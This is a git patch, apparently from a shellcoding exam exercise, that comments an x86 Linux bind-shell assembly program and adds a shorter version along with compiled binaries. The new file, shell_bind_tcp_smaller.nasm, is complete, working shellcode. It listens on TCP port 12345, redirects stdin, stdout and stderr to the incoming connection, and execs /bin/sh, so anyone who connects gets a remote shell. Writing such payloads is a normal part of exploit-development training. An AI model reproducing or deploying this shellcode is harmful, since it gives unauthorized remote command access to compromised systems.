From 992e145a0e3cc2f8a13589fff6c1367092147cfb Mon Sep 17 00:00:00 2001
From: arno01 <andrey.arapov@gmail.com>
Date: Fri, 8 Mar 2013 16:06:25 +0100
Subject: [PATCH] Creating a smaller version of shell_bind_tcp ->
 shell_bind_tcp_smaller.nasm

---
 exam1/shell_bind_tcp              | Bin 628 -> 628 bytes
 exam1/shell_bind_tcp.nasm         |  24 +++++----
 exam1/shell_bind_tcp.o            | Bin 560 -> 560 bytes
 exam1/shell_bind_tcp_smaller      | Bin 0 -> 626 bytes
 exam1/shell_bind_tcp_smaller.nasm |  87 ++++++++++++++++++++++++++++++
 exam1/shell_bind_tcp_smaller.o    | Bin 0 -> 560 bytes
 6 files changed, 100 insertions(+), 11 deletions(-)
 create mode 100755 exam1/shell_bind_tcp_smaller
 create mode 100644 exam1/shell_bind_tcp_smaller.nasm
 create mode 100644 exam1/shell_bind_tcp_smaller.o

diff --git a/exam1/shell_bind_tcp b/exam1/shell_bind_tcp
index 61f977ee81788e4d2b4351c475c98faf852c86da..da129204fc5031e6362e8320fe2f150b3b3190b8 100755
GIT binary patch
delta 74
zcmeyu@`YuB3+odG28JgSJ?$8SCw48Htj8$E*fQCbQJL|{<V?oZicco6Z~zrB2rzv7
RuK`kt#McM$Cz~?a0|14e7773W

delta 76
zcmeyu@`YuB3+pom28L%7J?)q?m>4E@ESqe=D8kq_*_Bb5@!8}|#?^|?Ca`b-l`se}
UeEhEgQj5gb2l8J`Hf6F00GU@7F#rGn

diff --git a/exam1/shell_bind_tcp.nasm b/exam1/shell_bind_tcp.nasm
index 60ad88f..f16d7c9 100644
--- a/exam1/shell_bind_tcp.nasm
+++ b/exam1/shell_bind_tcp.nasm
@@ -105,7 +105,7 @@ _start:
 	push BYTE 6		; IPPROTO_TCP	|| 	int protocol);
 	push BYTE 1		; SOCK_STREAM	|| 	int type,
 	push BYTE 2		; AF_INET	|| socket(int domain,
-	mov ecx, esp
+	mov ecx, esp		; ECX - PTR to arguments for socket()
 	int 0x80
 
 	; EAX return
@@ -134,10 +134,10 @@ _start:
 
 	; ECX
 	xor edx, edx
-	push edx		; ANY HOST (0.0.0.0)}			||	struct in_addr sin_addr (unsigned long s_addr) };
-	;; push DWORD 0x0100007f	; For 127.0.0.1 HOST		||
-	push WORD 0x3930	; PORT 12345 (reverse),			|| 	unsigned short sin_port,
-	push WORD 2		; AF_INET				|| struct sockaddr { short sin_family,
+	push edx		; ANY HOST (0.0.0.0)}			||		struct in_addr sin_addr (unsigned long s_addr) };
+	;; push DWORD 0x0100007f	; For 127.0.0.1 HOST
+	push WORD 0x3930	; PORT 12345 (reverse),			||	 	unsigned short sin_port,
+	push WORD bx		; 2 - AF_INET				|| struct sockaddr { short sin_family,
 	mov ecx, esp		; Save PTR to sockaddr struct in ECX
 
 	push BYTE 16		; 	socklen_t addrlen);
@@ -188,7 +188,7 @@ _start:
 
 	; EAX
 	xor eax, eax
-	mov al, 102
+	mov al, 102		; socketcall
 
 	; EBX
 	xor ebx, ebx
@@ -217,19 +217,21 @@ _start:
 	; 63		sockfd		2
 	;
 
-	mov ebx, eax		; move current fd (socket) to EBX
+	; move our sockfd to EBX
+	mov ebx, eax
+
 	xor eax, eax
 	mov al, 63		; dup2 syscall
 	xor ecx, ecx		; 0 - stdin
-	int 0x80
+	int 0x80		; call dup2(sockfd, 0)
 
 	mov al, 63		; dup2 syscall
 	mov cl, 1		; 1 - stdout
-	int 0x80
+	int 0x80		; call dup2(sockfd, 1)
 
 	mov al, 63		; dup2 syscall
 	mov cl, 2		; 2 - stderr
-	int 0x80
+	int 0x80		; call dup2(sockfd, 2)
 
 
 
@@ -266,7 +268,7 @@ _start:
 	; EDX
 	push edx		; NULL terminator
 	mov edx, esp		; EDX is a PTR to a stack which has an address to NULL.
-	int 0x80
+	int 0x80		; call execve(EBX, ECX, EDX)
 
 
 
diff --git a/exam1/shell_bind_tcp.o b/exam1/shell_bind_tcp.o
index ff6b7e6bb2a3039fdc8a7a7c63f980bb7c008a46..90c691cdd40a6fdcc8739972d1d61daf10d0197d 100644
GIT binary patch
delta 21
dcmdnMvVmnn4P(p1+FgvnldTxjC(mb`2mo2*2oC@N

delta 23
fcmdnMvVmnn4P)EH+Fi^UObnAP7}F;&Wb6k3WjF{Z

diff --git a/exam1/shell_bind_tcp_smaller b/exam1/shell_bind_tcp_smaller
new file mode 100755
index 0000000000000000000000000000000000000000..c02515d22f5150240a7dde486276cb5ec4c0e467
GIT binary patch
literal 626
zcmah`KTE?v6n{zopt!_Y1f6t{)<_p!M1lpup;i!`u1S-S9%)*7C)lZ3vk86#SBHFr
zLdC6%t5el4;OM09r9B#4eDLn~=e>K}<3^|FbxqSig$@NE)ryNNHN?+Fp$1#%??MUm
zte)A}1DF#OlqE6^I+kIMQ{Q~Ec$sTlPiE6NdEx%GWxh83VE@p+OlI7;xS~SpTNc+8
zZ8kIZ!1bH-cp9G#zs+$Yh^it8s#T|xd^D1GyqvC0W2lH>SK1Du9LzCLOnP^6`Ivv$
z2G(i!GA8ZcLTqEIP^+z@QBWo#?Y^DUG=qXr&)EEULL)|6%q7iS#mvv!!%KDaRH%7M
z=aJq?ntm<cSA?&hP4piZb$ZPXYSnL`uArXW&+i-9fAmM6pnlHPK?GhHGN%){Ot$+>
nbnP(o29?MbU2t#v2Q2LM`oM&=2ND=_gizdbZD|AZA{TxEjL~hD

literal 0
HcmV?d00001

diff --git a/exam1/shell_bind_tcp_smaller.nasm b/exam1/shell_bind_tcp_smaller.nasm
new file mode 100644
index 0000000..14b28a1
--- /dev/null
+++ b/exam1/shell_bind_tcp_smaller.nasm
@@ -0,0 +1,87 @@
+; Filename: shell_bind_tcp_smaller.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+; DESC:
+; Binds to a port 12345
+; Execs Shell on incoming connection
+;
+; TODO:
+; 1. Port number should be easily configurable;
+;
+;
+
+global _start
+
+section .text
+
+_start:
+	xor eax, eax
+	mov al, 102		; socketcall
+	xor ebx, ebx
+	inc ebx			; 1 = SYS_SOCKET socket()
+	push BYTE 6		; IPPROTO_TCP	|| 	int protocol);
+	push BYTE 1		; SOCK_STREAM	|| 	int type,
+	push BYTE 2		; AF_INET	|| socket(int domain,
+	mov ecx, esp		; ECX - PTR to arguments for socket()
+	int 0x80
+	mov esi, eax		; save socket fd in ESI for later
+
+	push BYTE 102
+	pop eax			; socketcall
+	inc ebx			; 2 = SYS_BIND bind()
+	xor edx, edx
+	push edx		; 0 = ANY HOST (0.0.0.0)}		||		struct in_addr sin_addr (unsigned long s_addr) };
+	push WORD 0x3930	; PORT 12345 (reverse),			||	 	unsigned short sin_port,
+	push WORD bx		; 2 = AF_INET				|| struct sockaddr { short sin_family,
+	mov ecx, esp		; Save PTR to sockaddr struct in ECX
+	push BYTE 16		; 	socklen_t addrlen);
+	push ecx		; 	const struct sockaddr *addr,
+	push esi		; bind(int sockfd,
+	mov ecx, esp		; ECX = PTR to arguments for bind()
+	int 0x80
+
+
+	mov BYTE al, 102	; socketcall
+	inc ebx
+	inc ebx			; 4 = SYS_LISTEN listen()
+	push BYTE 1		; 	int backlog);
+	push esi		; listen(int sockfd,
+	mov ecx, esp		; ECX = PTR to arguments for listen()
+	int 0x80
+
+
+	mov BYTE al, 102	; socketcall
+	inc ebx			; 5 = SYS_ACCEPT = accept()
+	push edx		; 	socklen_t *addrlen = 0);
+	push edx		; 	struct sockaddr *addr = NULL,
+	push esi		; listen(int sockfd,
+	mov ecx, esp		; ECX = PTR to arguments for accept()
+	int 0x80
+
+
+	; dup2 to duplicate sockfd, that will attach the client to a shell
+	; that we'll spawn below in execve syscall
+	xchg eax, ebx		; after EBX = sockfd, EAX = 5
+	push BYTE 2
+	pop ecx
+dup2_loop:
+	mov BYTE al, 63
+	int 0x80
+	dec ecx
+	jns dup2_loop
+
+
+	; spawning as shell
+	xor eax, eax
+	push eax
+	push 0x68732f6e		; '//bin/sh' in reverse
+	push 0x69622f2f		; beginning of '//bin/sh' string is here
+	mov ebx, esp
+	push eax
+	mov edx, esp		; ESP is now pointing to EDX
+	push ebx
+	mov ecx, esp
+	mov al, 11		; execve
+	int 0x80
+
diff --git a/exam1/shell_bind_tcp_smaller.o b/exam1/shell_bind_tcp_smaller.o
new file mode 100644
index 0000000000000000000000000000000000000000..d781a95b3b7e4aa57f45f81cd663b3081ad4b495
GIT binary patch
literal 560
zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpH?8JJ*7Nuoh!f-oCYmjIBHjAViUl+6yL
znUTaBfa(;H_#iVtKoE$LU9tfv5daipLBb$2C4m^(Jdh?mpco9m%!Ba_4{S&?yzQLD
zmc^LG)cNpiL+7!qv<PRzOF?NF29{~Toe#4F0>eNO8`7MevlwB_pdc`7au!qM2K%!O
zo|Qih4+Lc7=@(~Y=<6qCc0La1d<4|If%|L&%qj@2SCU#$!k|~2QCw0~l9&W!Rpvry
z2p?571`pZ&EDRt2BP#&KqzX{L87|1kAPZ+RFbIHRq&OorCnr8BGcP5+B)K5II5#mT
fC$&f~FR?h6A-=dIv8aS0rL@2(J|{oF0H_xLE`d<?

literal 0
HcmV?d00001